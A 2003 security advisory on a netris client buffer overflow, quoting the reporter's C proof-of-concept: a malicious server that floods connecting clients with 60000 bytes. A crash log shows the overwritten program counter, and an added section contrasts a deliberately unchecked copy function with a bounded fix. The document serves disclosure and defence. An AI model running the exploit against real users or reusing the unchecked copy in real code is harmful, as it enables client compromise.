netris Client Buffer Overflow May Let Remote Servers Execute Arbitrary Code on the Client
SecurityTracker Alert ID: 1007545

CVE Reference: CAN-2003-0685

Date: Aug 21 2003

Impact: Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Version(s): 0.52 and prior versions

Description: A buffer overflow vulnerability was reported in the netris game. A remote user acting as a netris server can cause arbitrary code to be executed on a connected netris client.
It is reported that the software does not properly validate the bounds of user-supplied data (received from the server). A remote server can send specially crafted data to a connected netris client to trigger a buffer overflow, resulting in the execution of arbitrary code with the privileges of the netris client.
A demonstration exploit is provided in the Source Message.

Impact: A remote user (acting as a netris server) can cause arbitrary code to be executed on a connected netris client. The code will run with the privileges of the user running the netris client.

Solution: No solution was available at the time of this entry.

Vendor URL: www.netris.org/

Cause: Boundary error

Reported By: Shaun Colley <shaunige@yahoo.co.uk>

Message History:
None.

Source Message Contents

Date: Tue, 12 Aug 2003 18:03:02 +0100 (BST)
From: Shaun Colley <shaunige@yahoo.co.uk>
Subject: Netris client Buffer Overflow Vulnerability.

-[INTRODUCTION]-
Netris is a Linux clone of the classic infamous game Tetr*s, giving users three main game modes: play an individual game; server mode: bind to a port and wait for an incoming connection from an opponent's Netris client; and connect mode: connect to an opponent's Netris client which is listening for connections on a selected port. A vulnerability has already been discovered (http://www.securityfocus.com/bid/5680/info/) that when Netris is run in listen mode, it leaves itself open to a "critical" buffer overflow vulnerability due to insufficient bounds checking, which could result in root privileges for the attacker, or else the UID of the user running Netris. However, I have discovered a new vulnerability in which Netris is also vulnerable to a similar buffer overflow attack when running in client mode (connecting to a remote opponent's Netris client in listen mode, rather than listening for an incoming connection), due to insufficient bounds checking of what the server sends.
-[EXPLOIT]-
The following code is a small PoC exploit program I have written to exploit the existing buffer overflow vulnerability, causing a DoS (corruption of the stack, crashing of the Netris program). It binds itself to a port and exploits the buffer overflow vulnerability in the Netris program when a Netris client attempts to connect:
------------------------CUT HERE----------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define BACKLOG 1

int main(int argc, char *argv[]) {
    int sock, csock;
    struct sockaddr_in client;
    struct sockaddr_in me;
    socklen_t sinlen;
    char buffer[60001];

    if(argc < 2) {
        printf("Usage: %s <port>\n", argv[0]);
        exit(-1);
    }

    /* 60000 bytes of 'a', NUL-terminated so that strlen() below is well defined */
    memset(buffer, 'a', 60000);
    buffer[60000] = '\0';

    if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("Couldn't create socket!\n");
        exit(-1);
    }
    me.sin_family = AF_INET;
    me.sin_port = htons(atoi(argv[1]));
    me.sin_addr.s_addr = INADDR_ANY;
    if(bind(sock, (struct sockaddr *)&me, sizeof(struct sockaddr)) == -1) {
        perror("bind()");
        exit(-1);
    }
    listen(sock, BACKLOG);
    printf("Listening on port %s for connections...\n", argv[1]);
    sinlen = sizeof(struct sockaddr);
    while(1) {
        csock = accept(sock, (struct sockaddr *)&client, &sinlen);
        printf("Got connection, sending...\n");
        /* the oversized "greeting" that overflows the connecting client's buffer */
        send(csock, buffer, strlen(buffer), 0);
        sleep(1);
        close(csock);
    }
}
------------------------CUT HERE----------------------
Here is a simple example of the exploitation process of the Netris program:
------------------------CUT HERE----------------------
[shaunige@localhost exploits]$ ./netris-exploit 1234
Listening on port 1234 for connections...
Got connection, sending...
# whilst meantime in the other window:
[shaunige@localhost shaunige]$ netris -c localhost -p 1234
Your opponent is using an old, incompatible version of
Netris. They should get the latest version.
Segmentation fault (core dumped)
[shaunige@localhost shaunige]$ gdb -c core.13140
GNU gdb 5.2.1-2mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu".
Core was generated by `netris -c localhost -p 1234'.
Program terminated with signal 11, Segmentation fault.
#0 0x61616161 in ?? ()
(gdb) quit
[shaunige@localhost shaunige]$
------------------------CUT HERE----------------------
As you can see, I tried to connect to what I thought was my to-be opponent's Netris program in listen mode, and the listening server sent a huge string to the client, overflowing the buffer in which Netris is expecting to receive greetings from the remote Netris program, asking it to start the game.
Obviously, the vulnerability can instead be exploited by an attacker to execute arbitrary code on the victim's machine, with the privileges of the user running Netris to connect to the listening port, rather than simply causing a DoS situation.
-[PATCH/WORKAROUND]-
I have not yet written a patch to fix this vulnerability in Netris; I am in the process of contacting the vendor regarding this matter.
-[CREDIT]-
I discovered this vulnerability on 11/08/03.
Thank you for your time.
Shaun.
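The core dump in the message above ends with the program counter at 0x61616161 ("aaaa"), which is what an unbounded copy of the server's oversized greeting into a fixed stack buffer produces. The C below is an added example written for this page, not netris source and not the reporter's code: it places that vulnerable copy pattern beside a bounded reader that rejects an over-long greeting instead of overflowing. The greeting format (a newline-terminated version string), the 64-byte buffer, the function names and the sample inputs are all assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not netris source. The greeting is assumed (hypothetically)
 * to be a newline-terminated version string received from the peer; the
 * 64-byte buffer, the function names and the sample inputs are assumptions. */
#define GREETING_MAX 64

/* Vulnerable pattern: copy bytes up to the newline into a fixed stack buffer
 * with no check against its size. A peer that sends more than GREETING_MAX-1
 * bytes before any newline (the PoC sends 60000 'a's and no newline at all)
 * writes past greeting[] into the rest of the frame, consistent with the
 * 0x61616161 program counter in the core dump. Never feed it untrusted input. */
int read_greeting_unsafe(const char *data, size_t len, char *out)
{
    char greeting[GREETING_MAX];
    size_t i = 0;
    while (i < len && data[i] != '\n') {
        greeting[i] = data[i];      /* no bounds check on i */
        i++;
    }
    greeting[i] = '\0';
    strcpy(out, greeting);
    return (int)i;
}

/* Hardened form: the scan is bounded by both the bytes available and the
 * destination size, and a greeting that does not end within that limit is
 * rejected outright rather than silently truncated. Returns the greeting
 * length, or -1 on rejection; never writes outside out[0 .. out_sz-1]. */
int read_greeting_safe(const char *data, size_t len, char *out, size_t out_sz)
{
    size_t limit = len < out_sz ? len : out_sz;
    size_t i;
    for (i = 0; i < limit; i++) {
        if (data[i] == '\n') {
            memcpy(out, data, i);   /* i < out_sz, so i bytes plus the NUL fit */
            out[i] = '\0';
            return (int)i;
        }
    }
    return -1;                      /* no terminator within out_sz bytes */
}

/* Constructed sample input (not captured netris traffic). */
static const char BENIGN[] = "NETRIS 0.52\nnext message";

/* Well-formed greeting: accepted, returns 11, leaves "NETRIS 0.52" in out. */
int demo_benign_greeting(void)
{
    char version[GREETING_MAX];
    int n = read_greeting_safe(BENIGN, sizeof BENIGN - 1, version, sizeof version);
    return (n == 11 && strcmp(version, "NETRIS 0.52") == 0) ? n : -1;
}

/* Hostile greeting modelled on the PoC: 60000 bytes of 'a' and no newline.
 * The bounded reader stops scanning at GREETING_MAX and returns -1. */
int demo_hostile_greeting(void)
{
    char version[GREETING_MAX];
    size_t n = 60000;
    char *payload = malloc(n);
    int rc;
    if (payload == NULL) return -2;
    memset(payload, 'a', n);
    rc = read_greeting_safe(payload, n, version, sizeof version);
    free(payload);
    return rc;
}

/* Boundary check: body_len bytes of 'v' followed by '\n'. 63 is the longest
 * body that fits together with its NUL; 64 must be rejected. */
int demo_boundary(size_t body_len)
{
    char version[GREETING_MAX];
    char *msg = malloc(body_len + 1);
    int rc;
    if (msg == NULL) return -2;
    memset(msg, 'v', body_len);
    msg[body_len] = '\n';
    rc = read_greeting_safe(msg, body_len + 1, version, sizeof version);
    free(msg);
    return rc;
}

int main(void)
{
    printf("benign:   %d\n", demo_benign_greeting());   /* 11 */
    printf("hostile:  %d\n", demo_hostile_greeting());  /* -1 */
    printf("63 bytes: %d\n", demo_boundary(63));        /* 63 */
    printf("64 bytes: %d\n", demo_boundary(64));        /* -1 */
    return 0;
}
```

The bounded reader is fed the same 60000-byte payload the PoC sends and returns -1 without writing anything outside its buffer; the 63- and 64-byte cases show the limit is applied with the terminating NUL counted. Rejecting an oversized greeting, rather than truncating it, also avoids a truncated handshake being accepted as a shorter but valid-looking message.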